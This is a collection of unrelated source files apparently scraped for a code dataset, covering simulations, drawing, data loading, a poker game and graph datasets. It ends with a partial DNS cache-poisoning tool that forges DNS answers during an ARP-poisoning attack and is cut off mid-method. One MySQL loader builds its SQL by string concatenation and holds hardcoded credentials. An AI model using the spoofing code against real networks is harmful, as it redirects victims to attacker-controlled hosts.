+{"seq_id":"70875028","text":"YEAR = ['0910','1011','1112','1213'];\nGRADE = ['K1','K2','06','09'];\nALG = ['TTC','ClinchTrade','FirstClinchTrade','DA','ETTC','RSD','PTC','PCT'];\nN=50;\n\ncount=0;\nsyst = '\\\\'\n\nif (syst == '\\\\'):\n inpath = 'P:\\\\RA\\\\vira\\\\code\\\\vira\\\\AllProjectCodes\\\\BPS+Simulations'\n #outpath = 'P:\\\\RA\\\\vira\\\\code\\\\parag\\\\BPS\\\\outputs\\\\';\nif (syst == '/'):\n inpath = '/proj/pppathak/RA/vira/code/vira/AllProjectCodes/BPS+Simulations'\n outpath = '/proj/pppathak/RA/vira/code/parag/BPS/outputs/';\npath=inpath;\n#YEAR=['1112','1213'];\nfor year in YEAR:\n for grade in GRADE:\n for alg in ['PTC']:\n count=count+1;\n f = open(path+syst+'Scripts'+syst+'PTC50'+str(count)+'.sh','wb');\n f.write('export YEAR='+year+'\\n');\n f.write('export GRADE='+grade+'\\n');\n f.write('export N='+str(N)+'\\n');\n f.write('export ALG='+alg+'\\n');\n inpath = '/proj/pppathak/RA/vira/code/vira/AllProjectCodes/BPS+Simulations'\n f.write('cd '+inpath+'\\n');\n f.write('python '+inpath+'/Statisticsv1.py'+'\\n');\n f.close()\n\n \n","sub_path":"ShScriptsBPS.py","file_name":"ShScriptsBPS.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"229261244","text":"#!/usr/bin/env python3\n# -----------------------------------------------------------------------------\n# Copyright (c) 2016+ Buro Petr van Blokland + Claudia Mens\n# www.pagebot.io\n#\n# P A G E B O T\n#\n# Licensed under MIT conditions\n#\n# Supporting DrawBot, www.drawbot.com\n# Supporting Flat, xxyxyz.org/flat\n# -----------------------------------------------------------------------------\n#\n# drawSpirals.py\n#\n\nfrom pagebot.toolbox.units import pt\nfrom pagebot.toolbox.color import noColor, blackColor\nfrom pagebot import getContext\nc = getContext()\n#import pagebot # Import to know the path of non-Python resources.\n\nX = 0\nY = 0\nN = 8*8\nSx = 10\nSy = 10\nExy = 0.58\nD = 0.5\n\n# hardcoded constants:\nW = H = 1000\nM = 20\nw = W - 2*M\nh = H - 2*H\n\n#dict(name='ElementOrigin', ui='CheckBox', args=dict(value=False)),\nc.Variable(\n [dict(name='X', ui='Slider',\n args=dict(minValue=-W/2, value=0, maxValue=W/2)),\n dict(name='Y', ui='Slider',\n args=dict(minValue=-H/2, value=0, maxValue=H/2)),\n dict(name='N', ui='Slider',\n args=dict(minValue=8*2, value=8*8, maxValue=8*32)),\n dict(name='Sx', ui='Slider',\n args=dict(minValue=2, value=10, maxValue=40)),\n dict(name='Sy', ui='Slider',\n args=dict(minValue=2, value=10, maxValue=40)),\n dict(name='Exy', ui='Slider',\n args=dict(minValue=0.01, value=0.58, maxValue=1)),\n dict(name='D', ui='Slider',\n args=dict(minValue=0.1, value=0.5, maxValue=5))\n ], globals())\n\ndef drawSpiral():\n mx = W/2+X\n my = H/2+Y\n runs = False\n c.newPath()\n c.moveTo((pt(mx), pt(my)))\n \n for n in range(0, int(N), 4):\n dx1 = n*Sx*D\n dy1 = n*Sy*D\n dx2 = (n+1)*Sx*D\n dy2 = (n+1)*Sy*D\n dx3 = (n+2)*Sx*D\n dy3 = (n+2)*Sy*D\n dx4 = (n+3)*Sx*D\n dy4 = (n+3)*Sy*D\n #dx5 = (n+4)*Sx*D\n #dy5 = (n+4)*Sy*D\n if not runs:\n c.moveTo((pt(mx), pt(my)))\n else:\n c.curveTo((pt(mx-dx1*Exy), pt(my-dy1)),\n (pt(mx-dx1), pt(my-dy1*Exy)), (pt(mx-dx1), pt(my)))\n c.curveTo((pt(mx-dx2), pt(my+dy2*Exy)),\n (pt(mx-dx2*Exy), pt(my+dy2)), (pt(mx), pt(my+dy2)))\n c.curveTo((pt(mx+dx3*Exy), pt(my+dy3)),\n (pt(mx+dx3), pt(my+dy3*Exy)), (pt(mx+dx3), pt(my)))\n c.curveTo((pt(mx+dx4), pt(my-dy4*Exy)), (pt(mx+dx4*Exy), pt(my-dy4)),\n (pt(mx), pt(my-dy4)))\n runs = True\n\n c.fill(noColor)\n c.stroke(blackColor)\n c.drawPath()\n\nc.newPage(pt(W), pt(H))\ndrawSpiral()\nc.saveImage(\"_export/Spiral.pdf\")\n","sub_path":"Examples/04_Drawing/DrawSpirals.py","file_name":"DrawSpirals.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"463661777","text":"import pandas as pd\n\nclass FileLoader:\n def load(self, path):\n try:\n df=pd.read_csv(path)\n print(f\"Loading dataset of dimensions {df.shape[0]} x {df.shape[1]}\")\n return df\n except Exception as e:\n print(f\"Error {e}\")\n return None\n \n def display(self, df, n):\n if isinstance(df, pd.DataFrame):\n if n > 0:\n print(df.head(n))\n else:\n print(df.tail(abs(n)))\n else:\n print(\"Provided data is not valid pandas Dataframe\")","sub_path":"day04/ex05/FileLoader.py","file_name":"FileLoader.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"454259579","text":"#!/usr/bin/env python3\n\n\"\"\"\nParser for run_mosdepth.sh\n\"\"\"\n\nimport logging\nimport csv\n\nfrom multiqc.utils import config, report\n\nlog = logging.getLogger(__name__)\n\n\ndef parse_reports(self):\n\n # Set up vars\n self.mosdepth = dict()\n\n # Collect metrics\n for f in self.find_log_files('multiqc_npm/mosdepth', filehandles=True):\n\n # Collect relevant records and calculate metrics\n vals = list()\n for l in f[\"f\"]:\n v = l.strip(\"\\n\").split(\",\")\n vals.append(v)\n parsed_data = dict(zip(vals[0], vals[1]))\n\n # Save results\n s_name = f[\"s_name\"]\n self.mosdepth[s_name] = parsed_data\n\n # Write results\n if len(self.mosdepth) > 0:\n\n # Write parsed data to a file\n self.write_data_file(self.mosdepth, 'multiqc_npm_mosdepth')\n\n # Return the number of detected samples to the parent module\n return len(self.mosdepth)\n","sub_path":"multiqc_npm/modules/npm_mosdepth.py","file_name":"npm_mosdepth.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"494492188","text":"# An Vo\n# CSC119.103\n# April 23, 2018\n#\n# Lab 10\n\n\ndef keepGoing():\n x = input('Would you like to keep modifying files? (Y/N)').lower()\n if x == 'y':\n return True\n if x == 'n':\n return False\n else:\n x = input('Invalid answer. Would You like to continue? (Y/N)')\n\n\ndef nameFile():\n name = input('What is the name of the file?: ')\n return name\n\n\ndef createFile(name):\n inputFile = open(name, 'w')\n line = input(\"Enter a line. Enter 'quit' to end: \")\n while line != 'quit':\n line = line + '\\n'\n inputFile.write(line)\n line = input(\"Enter a line. Enter 'quit' to end: \")\n inputFile.close()\n\n\ndef addInFile(name):\n inputFile = open(name, 'a') # Adds or\n line = input(\"Enter a line. Enter 'quit' to end: \")\n while line != 'quit':\n line = line + '\\n'\n inputFile.write(line)\n line = input(\"Enter a line. Enter 'quit' to end: \")\n inputFile.close()\n\n\ndef printFile(name):\n try:\n name = name\n inputFile = open(name, 'r')\n for innerLine in inputFile:\n fields = innerLine.split(',')\n print('{:15s}{:>5s}{:5s}{:<10s}{:>15s}{:>15s}'.format(fields[0], fields[1], '', fields[2],fields[3], fields[4]))\n inputFile.close()\n except IOError:\n print(\"The file '\" + name + \"' does not exist, please enter valid file\")\n name = nameFile()\n\n\ndef whatToDo():\n print()\n print('What would you like to do with a file?')\n print('Create a new file (C).\\nAdd to a file (A).\\nRead a file (R).')\n x = input().lower()\n valid = True\n while valid:\n if x == 'c' or x == 'a' or x == 'r':\n valid = False\n return x\n else:\n x = input('Please enter valid choice. ')\n\n\ndef pathway(choice):\n if choice == 'c':\n createFile(nameFile())\n if choice == 'a':\n addInFile(nameFile())\n if choice == 'r':\n printFile(nameFile())\n\n\nx = True\nwhile x:\n pathway(whatToDo())\n x = keepGoing()\nprint()\nprint('Thank you for using this program')\n\n\n\n\n\n\n","sub_path":"IntroToCSC - ACC/Labs/Lab 10.py","file_name":"Lab 10.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"331532901","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 17 13:31:41 2019\n\n@author: user\n\n\ndirPath = r\"E:\\\\Download\\\\20190701法律科技開放法學資料\\\\python測試\\\\福建連江地方法院\"\n\"\"\"\n\nimport pymysql\nimport json\nimport os \n \ndirPath = r\"E:\\\\Download\\\\20190701法律科技開放法學資料\\\\python測試\\\\智慧財產法院\"\nresult = [f for f in os.listdir(dirPath) if os.path.isfile(os.path.join(dirPath, f))]\n\nfor j in result:\n with open((dirPath+\"\\\\\"+j),mode='r', encoding='UTF-8') as f:\n def readJSON(str):\n with open(\"E:\\\\Download\\\\20190701法律科技開放法學資料\\\\python測試\\\\智慧財產法院\\\\\"+j+\"\", encoding=\"utf-8\") as JS:\n reading = json.load(JS)\n a=json.dumps(reading[\"court\"],ensure_ascii=False)\n b=json.dumps(reading[\"date\"],ensure_ascii=False)\n c=json.dumps(reading[\"no\"],ensure_ascii=False)\n d=json.dumps(reading[\"sys\"],ensure_ascii=False)\n e=json.dumps(reading[\"reason\"],ensure_ascii=False)\n f=json.dumps(reading[\"judgement\"],ensure_ascii=False)\n db = pymysql.connect(host='localhost', port=3307, user='Flash', passwd='THE_FLASH', db='7月新的資料', charset='utf8')\n \n a=a.replace('\"',\"\")\n b=b.replace('\"',\"\")\n c=c.replace('\"',\"\")\n d=d.replace('\"',\"\")\n e=e.replace('\"',\"\")\n f=f.replace('\"',\"\")\n f=f.replace(\"\\\\\",\"\") \n f=f.replace('r','')\n f=f.replace('n','')\n \"\"\"\n 主文=c.find('主 文')\n 理由=c.find('理 由')\n 理由結束=c.find('中 華 民 國')\n 審判長法官=c.find('審判長法官')\n 法官2=c.find('法官',(審判長法官+14))\n 法官3=c.find('法官',(法官2+14))\n 法官4=c.find('法官',(法官3+14))\n 法官5=c.find('法官',(法官4+14))\n j主=c[(主文+4):(理由)]\n j理=c[(理由+4):(理由結束)]\n j審=c[(審判長法官+7):(審判長法官+14)]\n j官1=c[(法官2+4):(法官2+14)]\n j官2= c[(法官3+4):(法官3+14)]\n j官3= c[(法官4+4):(法官4+14)]\n j官4=c[(法官5+4):(法官5+14)]\n\"\"\"\n#建立操作游標\n cursor = db.cursor()\n#SQL語法\n sql = \"INSERT INTO 智慧財產法院(jcourt,jdate,jno,jsys,jreason,jjudegement) VALUES ('\"+a+\"','\"+b+\"','\"+c+\"','\"+d+\"','\"+e+\"','\"+f+\"')\" \n try:\n cursor.execute(sql)\n #提交修改\n db.commit()\n print('success')\n except:\n #發生錯誤時停止執行SQL\n db.rollback()\n print('error')\n#關閉連線\n db.close()\n print(reading[str])\n JS.close()\n readJSON(\"no\")","sub_path":"pymysql_餵7月新資料.py","file_name":"pymysql_餵7月新資料.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"168957327","text":"import random\nfrom copy import deepcopy\n\nfrom rlcard.games.limitholdem.dealer import LimitholdemDealer as Dealer\nfrom rlcard.games.limitholdem.player import LimitholdemPlayer as Player\nfrom rlcard.games.limitholdem.judger import LimitholdemJudger as Judger\nfrom rlcard.games.limitholdem.round import LimitholdemRound as Round\n\nclass LimitholdemGame(object):\n\n def __init__(self):\n ''' Initialize the class limitholdem Game\n '''\n\n super().__init__()\n\n # Some configarations of the game\n # These arguments can be specified for creating new games\n\n # Small blind and big blind\n self.small_blind = 1\n self.big_blind = 2 * self.small_blind\n\n # Raise amount and allowed times\n self.raise_amount = 2 * self.big_blind\n self.allowed_raise_num = 4\n\n self.num_players = 2\n\n def init_game(self):\n ''' Initialilze the game of Limit Texas Hold'em\n\n This version supports two-player limit texas hold'em\n\n Returns:\n (tuple): Tuple containing:\n\n (dict): The first state of the game\n (int): Current player's id\n '''\n\n # Initilize a dealer that can deal cards\n self.dealer = Dealer()\n\n # Initilize two players to play the game\n self.players = [Player(i) for i in range(self.num_players)]\n\n # Initialize a judger class which will decide who wins in the end\n self.judger = Judger()\n\n # Deal cards to each player to prepare for the first round\n for i in range(2 * self.num_players):\n self.players[i % self.num_players].hand.append(self.dealer.deal_card())\n\n # Initilize public cards\n self.public_cards = []\n\n # Randomly choose a big blind and a small blind\n b = random.randint(0, self.num_players-1)\n s = (b + 1) % self.num_players\n self.players[b].in_chips = self.big_blind\n self.players[s].in_chips = self.small_blind\n\n # The player next to the samll blind plays the first\n self.button = (s + 1) % self.num_players\n\n # Initilize a bidding round, in the first round, the big blind and the small blind needs to\n # be passed to the round for processing.\n self.round = Round(raise_amount=self.raise_amount,\n allowed_raise_num=self.allowed_raise_num,\n num_players=self.num_players)\n\n self.round.start_new_round(button=self.button, raised=[p.in_chips for p in self.players])\n\n # Count the round. There are 4 rounds in each game.\n self.round_counter = 0\n\n # Save the hisory for stepping back to the last state.\n self.history = []\n\n state = self.get_state(self.button)\n\n return state, self.button\n\n def step(self, action):\n ''' Get the next state\n\n Args:\n action (str): a specific action. (call, raise, fold, or check)\n\n Returns:\n (tuple): Tuple containing:\n\n (dict): next player's state\n (int): next plater's id\n '''\n\n # First snapshot the current state\n r = deepcopy(self.round)\n b = self.button\n r_c = self.round_counter\n d = deepcopy(self.dealer)\n p = deepcopy(self.public_cards)\n ps = deepcopy(self.players)\n self.history.append((r, b, r_c, d, p, ps))\n\n # Then we proceed to the next round\n self.button = self.round.proceed_round(self.players, action)\n\n # If a round is over, we deal more public cards\n if self.round.is_over():\n # For the first round, we deal 3 cards\n if self.round_counter == 0:\n self.public_cards.append(self.dealer.deal_card())\n self.public_cards.append(self.dealer.deal_card())\n self.public_cards.append(self.dealer.deal_card())\n # For the following rounds, we deal only 1 card\n elif self.round_counter <= 2:\n self.public_cards.append(self.dealer.deal_card())\n\n self.round_counter += 1\n self.round.start_new_round(self.button)\n\n state = self.get_state(self.button)\n\n return state, self.button\n\n def step_back(self):\n ''' Return to the previous state of the game\n\n Returns:\n (bool): True if the game steps back successfully\n '''\n\n if len(self.history) > 0:\n self.round, self.button, self.round_counter, self.dealer, self.public_cards, self.players = self.history.pop()\n return True\n return False\n\n def get_player_num(self):\n ''' Return the number of players in Limit Texas Hold'em\n\n Returns:\n (int): The number of players in the game\n '''\n\n return self.num_players\n\n @staticmethod\n def get_action_num():\n ''' Return the number of applicable actions\n\n Returns:\n (int): The number of cations. There are 4 actions (call, raise, check and fold)\n '''\n\n return 4\n\n def get_player_id(self):\n ''' Return the current player's id\n\n Returns:\n (int): current player's id\n '''\n\n return self.button\n\n def get_state(self, player):\n ''' Return player's state\n\n Args:\n player_id (int): player id\n\n Returns:\n (dict): The state of the player\n '''\n\n chips = [self.players[i].in_chips for i in range(self.num_players)]\n state = self.players[player].get_state(self.public_cards, chips)\n\n return state\n\n\n def is_over(self):\n ''' Check if the game is over\n\n Returns:\n (boolean): True if the game is over\n '''\n\n alive_players = [1 if p.status=='alive' else 0 for p in self.players]\n # If only one player is alive, the game is over.\n if sum(alive_players) == 1:\n return True\n\n # If all rounds are finshed\n if self.round_counter >= 4:\n return True\n return False\n\n def get_payoffs(self):\n ''' Return the payoffs of the game\n\n Returns:\n (list): Each entry corresponds to the payoff of one player\n '''\n\n hands = [p.hand + self.public_cards if p.status=='alive' else None for p in self.players]\n payoffs = self.judger.judge_game(self.players, hands)\n return payoffs\n\n def get_legal_actions(self):\n ''' Return the legal actions for current player\n\n Returns:\n (list): A list of legal actions\n '''\n\n return self.round.get_legal_actions()\n\n# Test the game\n\nif __name__ == \"__main__\":\n game = LimitholdemGame()\n while True:\n print('New Game')\n state, button = game.init_game()\n print(button, state)\n i = 1\n while not game.is_over():\n i += 1\n legal_actions = game.get_legal_actions()\n if i == 3:\n print('Step back')\n print(game.step_back())\n button = game.get_player_id()\n print(button)\n legal_actions = game.get_legal_actions()\n\n action = random.choice(legal_actions)\n print(button, action, legal_actions)\n state, button = game.step(action)\n print(button, state)\n\n print(game.get_payoffs())\n\n","sub_path":"rlcard/games/limitholdem/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":7343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"209023376","text":"from utils import database\r\nfrom Locators.types import types\r\nfrom Pages.allPages import AllPages\r\n\r\nall_goods = []\r\n\r\nfor link in types.product_to_name.values():\r\n print(link)\r\n items = AllPages(link).items\r\n all_goods.extend(items)\r\n\r\n # data can be added to database directly from here (so next lines will be unnecessary)\r\n # for item in items:\r\n # database.addOne(item.category, item.name, item.city, item.price)\r\n\r\n\r\nwith open(\"data.txt\", \"a\", encoding=\"utf-8\") as f:\r\n for i in all_goods:\r\n f.write(f'{i.category}:#: {i.name}:#: {i.city}:#: {i.price}\\n')\r\n # data can be added directly from here\r\n # database.addOne(i.category, i.name, i.city, i.price)\r\n\r\n\r\ndatabase.createDatabase()\r\ndatabase.updateAll('data.txt')\r\ndatabase.seeAll()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"610675963","text":"import os\r\nimport gym\r\nimport vgdl\r\nimport vgdl.interfaces.gym\r\n\r\nfrom PIL import Image\r\n# from vgdl.util.humanplay.play_vgdl import register_vgdl_env\r\n\r\n\r\ndef register_vgdl_env(domain_file, level_file, observer=None, blocksize=None):\r\n from gym.envs.registration import register, registry\r\n level_name = '.'.join(os.path.basename(level_file).split('.')[:-1])\r\n env_name = 'vgdl_{}-v0'.format(level_name)\r\n\r\n register(\r\n id=env_name,\r\n entry_point='vgdl.interfaces.gym:VGDLEnv',\r\n kwargs={\r\n 'game_file': domain_file,\r\n 'level_file': level_file,\r\n 'block_size': blocksize,\r\n 'obs_type': observer or 'features',\r\n },\r\n #timestep_limit=10000,\r\n max_episode_steps=250,\r\n nondeterministic=True\r\n )\r\n\r\n return env_name\r\n\r\n\r\n# env = gym.make('gvgai-aliens-lvl0-v0')\r\n#############################################################################\r\n# vgdl.registry.register_from_string(\"vgdl.util.humanplay.play_vgdl\")\r\n\r\n# Fichero de dominio, fichero de nivel, observer, blocksize\r\n# env_name = register_vgdl_env(\"vgdl/games/aliens.txt\", \"vgdl/games/aliens_lvl0.txt\", None, 32)\r\nenv_name = register_vgdl_env(\"gvg_games/aliens_v0/aliens.txt\", \"gvg_games/aliens_v0/aliens_lvl0.txt\", 'image', 32)\r\n\r\n# ¿Tal vez haga falta?\r\nenv = gym.make(env_name)\r\n#############################################################################\r\n# obs = env.render(mode='rgb_array')\r\n# obs = env.render()\r\n# Para guardar imagenes\r\n# img = Image.fromarray(obs, 'RGB')\r\n# img.save('my_gvg.png')\r\nenv.render()\r\nenv.reset()\r\n\r\n# Obtener el input shape y reducir la ultima dimension a 3 (se elimina el canal alfa)\r\n# shape = list(env.observation_space.shape)\r\n# shape[2] = 3\r\n# shape = tuple(shape)\r\n\r\nsave_img = False\r\nscore = 0\r\nisOver = False\r\ni = 0\r\n\r\nwhile not isOver:\r\n action_id = env.action_space.sample()\r\n state, reward, isOver, info = env.step(action_id)\r\n # state = env.render()\r\n score += reward\r\n i += 1\r\n if save_img:\r\n img = Image.fromarray(state, 'RGB')\r\n img.save('tfm_exp_before_' + str(i) + '.png')\r\n # if i == 10:\r\n # game_state = env.game.get_game_state()\r\n # print(\"Guardando estado del juego\")\r\n\r\nprint(\"Score: \" + str(score))\r\nprint(\"i: \" + str(i))\r\n\r\n# env.game.set_game_state(game_state)\r\n# print(\"Cargando estado del juego\")\r\n\r\nenv.render()\r\nenv.reset()\r\n\r\nscore = 0\r\nisOver = False\r\ni = 0\r\n\r\nwhile not isOver:\r\n action_id = env.action_space.sample()\r\n state, reward, isOver, info = env.step(action_id)\r\n # state = env.render()\r\n score += reward\r\n i += 1\r\n if save_img:\r\n img = Image.fromarray(state, 'RGB')\r\n img.save('tfm_exp_after_' + str(i) + '.png')\r\n\r\nprint(\"Score: \" + str(score))\r\nprint(\"i: \" + str(i))\r\n","sub_path":"tfm_experimento.py","file_name":"tfm_experimento.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"575066900","text":"import torch\n\nfrom torch.utils.data import Dataset\nfrom torch_geometric.data import Data\nimport torch_geometric.data as PyGdata\n\nimport os\nimport glob\nimport pandas as pd\nimport numpy as np\nimport h5py\nimport re\nimport sys\nfrom pathlib import Path\n\n\ndef edge_index_from_file(graph_file):\n edge_index = np.genfromtxt(graph_file, delimiter=\"\\t\", dtype=int)\n edge_index = np.transpose(edge_index)\n edge_index = torch.tensor(edge_index, dtype=torch.long)\n # edge_index = torch.tensor(edge_index, dtype=torch.long).unsqueeze(-1)\n return edge_index\n\n\nclass NTIGADataset_simulator(PyGdata.Dataset):\n def __init__(\n self, path, root=None, transform=None, pre_transform=None, pre_filter=None\n ):\n p = os.path.dirname(path)\n self.file_path = path\n\n self.graph_edge_file = p + \"/pipe_graph_topo_17_local.txt\"\n\n self.edge_index = edge_index_from_file(self.graph_edge_file)\n\n with h5py.File(self.file_path, \"r\") as file:\n self.dataset_len = len(file[\"feature\"])\n self.feature = file[\"feature\"][:]\n self.target = file[\"target\"][:]\n\n self.num_in = self.feature.shape[-1]\n self.num_out = self.target.shape[-1]\n\n @property\n def raw_file_names(self):\n return\n\n @property\n def processed_file_names(self):\n return\n\n def __len__(self):\n return self.dataset_len\n\n def __getitem__(self, idx):\n\n # X = torch.from_numpy(self.feature[idx, :, :, :]).unsqueeze(0)\n # Y = torch.from_numpy(self.target[idx, :, :, :]).unsqueeze(0)\n # graph_data = Data(x=X, edge_index=self.edge_index.unsqueeze(-1), y=Y)\n\n X = torch.from_numpy(self.feature[idx, :, :, :]).permute(1, 2, 0)\n Y = torch.from_numpy(self.target[idx, :, :, :]).permute(1, 2, 0)\n graph_data = Data(x=X, edge_index=self.edge_index, y=Y)\n return graph_data\n\n\nclass NTIGADataset_new(PyGdata.Dataset):\n def __init__(\n self,\n file_path,\n recursive,\n load_data,\n data_cache_size=3,\n root=None,\n transform=None,\n pre_transform=None,\n pre_filter=None,\n ):\n # super(NTIGADataset, self).__init__(root, transform, pre_transform)\n\n self.data_info = []\n self.data_cache = {}\n self.data_cache_size = data_cache_size\n self.transform = transform\n\n p = Path(file_path)\n assert p.is_dir()\n if recursive:\n files = sorted(p.glob(\"**/*.h5\"))\n else:\n files = sorted(p.glob(\"*.h5\"))\n if len(files) < 1:\n raise RuntimeError(\"No hdf5 datasets found\")\n\n for h5dataset_fp in files:\n self._add_data_infos(str(h5dataset_fp.resolve()), load_data)\n\n self.graph_edge_file = file_path + \"/pipe_graph_topo_17_local.txt\"\n self.edge_index = edge_index_from_file(self.graph_edge_file)\n\n # p = os.path.dirname(path)\n # self.file_path = path\n # self.feature = None\n # self.target = None\n # with h5py.File(self.file_path, \"r\") as file:\n # self.dataset_len = len(file[\"feature\"])\n\n @property\n def raw_file_names(self):\n return\n\n @property\n def processed_file_names(self):\n return\n\n def __getitem__(self, index):\n X = self.get_data(\"feature\", index)\n Y = self.get_data(\"target\", index)\n\n X = torch.from_numpy(X)\n Y = torch.from_numpy(Y)\n\n graph_data = Data(x=X, edge_index=self.edge_index, y=Y)\n\n return graph_data\n\n def __len__(self):\n return len(self.get_data_infos(\"feature\"))\n\n def _add_data_infos(self, file_path, load_data):\n with h5py.File(file_path, \"r\") as h5_file:\n # Walk through all groups, extracting datasets\n # for gname, group in h5_file.items():\n # for dname, ds in group.items():\n for dname, ds in h5_file.items():\n for _tensor in ds[()]:\n # if data is not loaded its cache index is -1\n idx = -1\n if load_data:\n # add data to the data cache\n idx = self._add_to_cache(_tensor, file_path)\n\n # type is derived from the name of the dataset; we expect the dataset\n # name to have a name such as 'data' or 'label' to identify its type\n # we also store the shape of the data in case we need it\n self.data_info.append(\n {\n \"file_path\": file_path,\n \"type\": dname,\n \"shape\": _tensor.shape,\n \"cache_idx\": idx,\n }\n )\n\n def _load_data(self, file_path):\n \"\"\"Load data to the cache given the file\n path and update the cache index in the\n data_info structure.\n \"\"\"\n with h5py.File(file_path, \"r\", swmr=True) as h5_file:\n # for gname, group in h5_file.items():\n # for dname, ds in group.items():\n for dname, ds in h5_file.items():\n for _tensor in ds[()]:\n # add data to the data cache and retrieve\n # the cache index\n idx = self._add_to_cache(_tensor, file_path)\n\n # find the beginning index of the hdf5 file we are looking for\n file_idx = next(\n i\n for i, v in enumerate(self.data_info)\n if v[\"file_path\"] == file_path\n )\n\n # the data info should have the same index since we loaded it in the same way\n self.data_info[file_idx + idx][\"cache_idx\"] = idx\n\n # remove an element from data cache if size was exceeded\n if len(self.data_cache) > self.data_cache_size:\n # remove one item from the cache at random\n removal_keys = list(self.data_cache)\n removal_keys.remove(file_path)\n self.data_cache.pop(removal_keys[0])\n # remove invalid cache_idx\n self.data_info = [\n {\n \"file_path\": di[\"file_path\"],\n \"type\": di[\"type\"],\n \"shape\": di[\"shape\"],\n \"cache_idx\": -1,\n }\n if di[\"file_path\"] == removal_keys[0]\n else di\n for di in self.data_info\n ]\n\n def _add_to_cache(self, data, file_path):\n \"\"\"Adds data to the cache and returns its index. There is one cache\n list for every file_path, containing all datasets in that file.\n \"\"\"\n if file_path not in self.data_cache:\n self.data_cache[file_path] = [data]\n else:\n self.data_cache[file_path].append(data)\n return len(self.data_cache[file_path]) - 1\n\n def get_data_infos(self, type):\n \"\"\"Get data infos belonging to a certain type of data.\n \"\"\"\n data_info_type = [di for di in self.data_info if di[\"type\"] == type]\n return data_info_type\n\n def get_data(self, type, i):\n \"\"\"Call this function anytime you want to access a chunk of data from the\n dataset. This will make sure that the data is loaded in case it is\n not part of the data cache.\n \"\"\"\n fp = self.get_data_infos(type)[i][\"file_path\"]\n if fp not in self.data_cache:\n self._load_data(fp)\n\n # get new cache_idx assigned by _load_data_info\n cache_idx = self.get_data_infos(type)[i][\"cache_idx\"]\n return self.data_cache[fp][cache_idx]\n","sub_path":"GNNmodel/datasets/NTIGA_simulator_time.py","file_name":"NTIGA_simulator_time.py","file_ext":"py","file_size_in_byte":7705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"357325005","text":"import threading\n\nfrom scapy.all import *\nfrom scapy.layers.dns import DNS, DNSRR, DNSQR\nfrom scapy.layers.inet import UDP, IP\nfrom datetime import datetime\n\n\nclass DnsPois:\n\n def __init__(self):\n self.pois_vic_instead = False\n self.auth_ip = None\n self.rec_ip = None\n self.domain = None\n self.mal_ip = None\n self.stop = False\n self.thread = None\n self.stop_thread = None\n self.stop = False\n self.save = False\n\n @staticmethod\n def responder(auth_ip, rec_ip, mal_ip, domain, poison_vic):\n \"\"\"\n Forwards a packet to the original recipient if it is not a packet we wish to falsify\n \"\"\"\n\n def forward(pkt):\n send(pkt, verbose=0)\n\n \"\"\"\n Looks at a packet and decides whether it contains a DNS response for the domain we wish to spoof\n if so we falsify the packet\n if not we forward the packet to its original recipient\n \"\"\"\n\n def get_resp(pkt):\n\n if poison_vic:\n if DNS in pkt and str(pkt[IP].src) == auth_ip and str(pkt[IP].dst) == rec_ip and pkt.haslayer(UDP):\n if domain in str(pkt['DNS Question Record'].qname):\n spf_resp = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\\n UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\\n DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\n an=(DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=mal_ip)))\n send(spf_resp, verbose=0)\n return \"Sent a spoofed DNS response to \" + str(pkt['DNS Question Record'].qname)\n else:\n return forward(pkt)\n else:\n return forward(pkt)\n elif not poison_vic:\n if DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0 and str(pkt[IP].src) == rec_ip and \\\n str(pkt[IP].dst) == auth_ip:\n\n if domain in str(pkt['DNS Question Record'].qname):\n spf_resp = IP(dst=pkt[IP].src, src=pkt[IP].dst) / UDP(dport=pkt[UDP].sport,\n sport=pkt[UDP].dport) / DNS(\n id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, qdcount=1, rd=1, ancount=1, nscount=0,\n arcount=0,\n an=(DNSRR(rrname=pkt[DNS].qd.qname, type='A', ttl=3600, rdata=mal_ip)))\n send(spf_resp, verbose=0)\n return \"Sent a spoofed DNS response to \" + str(pkt['DNS Question Record'].qname)\n else:\n return forward(pkt)\n else:\n return forward(pkt)\n else:\n return forward(pkt)\n\n return get_resp\n\n def set(self, auth_dns, rec_dns, mal_dns, dom, save, poison_vic):\n \"\"\"\n Set all the information needed for a DNS cache poisoning attack\n :param auth_dns:\n :param rec_dns:\n :param mal_dns:\n :param dom:\n :param save:\n :return:\n \"\"\"\n self.domain = dom\n self.auth_ip = auth_dns\n self.rec_ip = rec_dns\n self.mal_ip = mal_dns\n self.save = save\n self.pois_vic_instead = poison_vic\n\n def start(self):\n \"\"\"\n Start the DNS cache poisoning attack\n :return:\n \"\"\"\n print(\"domain: \" + self.domain)\n print(\"auth server: \" + self.auth_ip)\n print(\"NS: \" + self.rec_ip)\n print(\"Fake site: \" + self.mal_ip)\n\n # Since ARP poisoning ongoing is a prerequisite\n # We have to turn off automatic forwarding\n # else the packets are forwarded before we can spoof them\n try:\n with 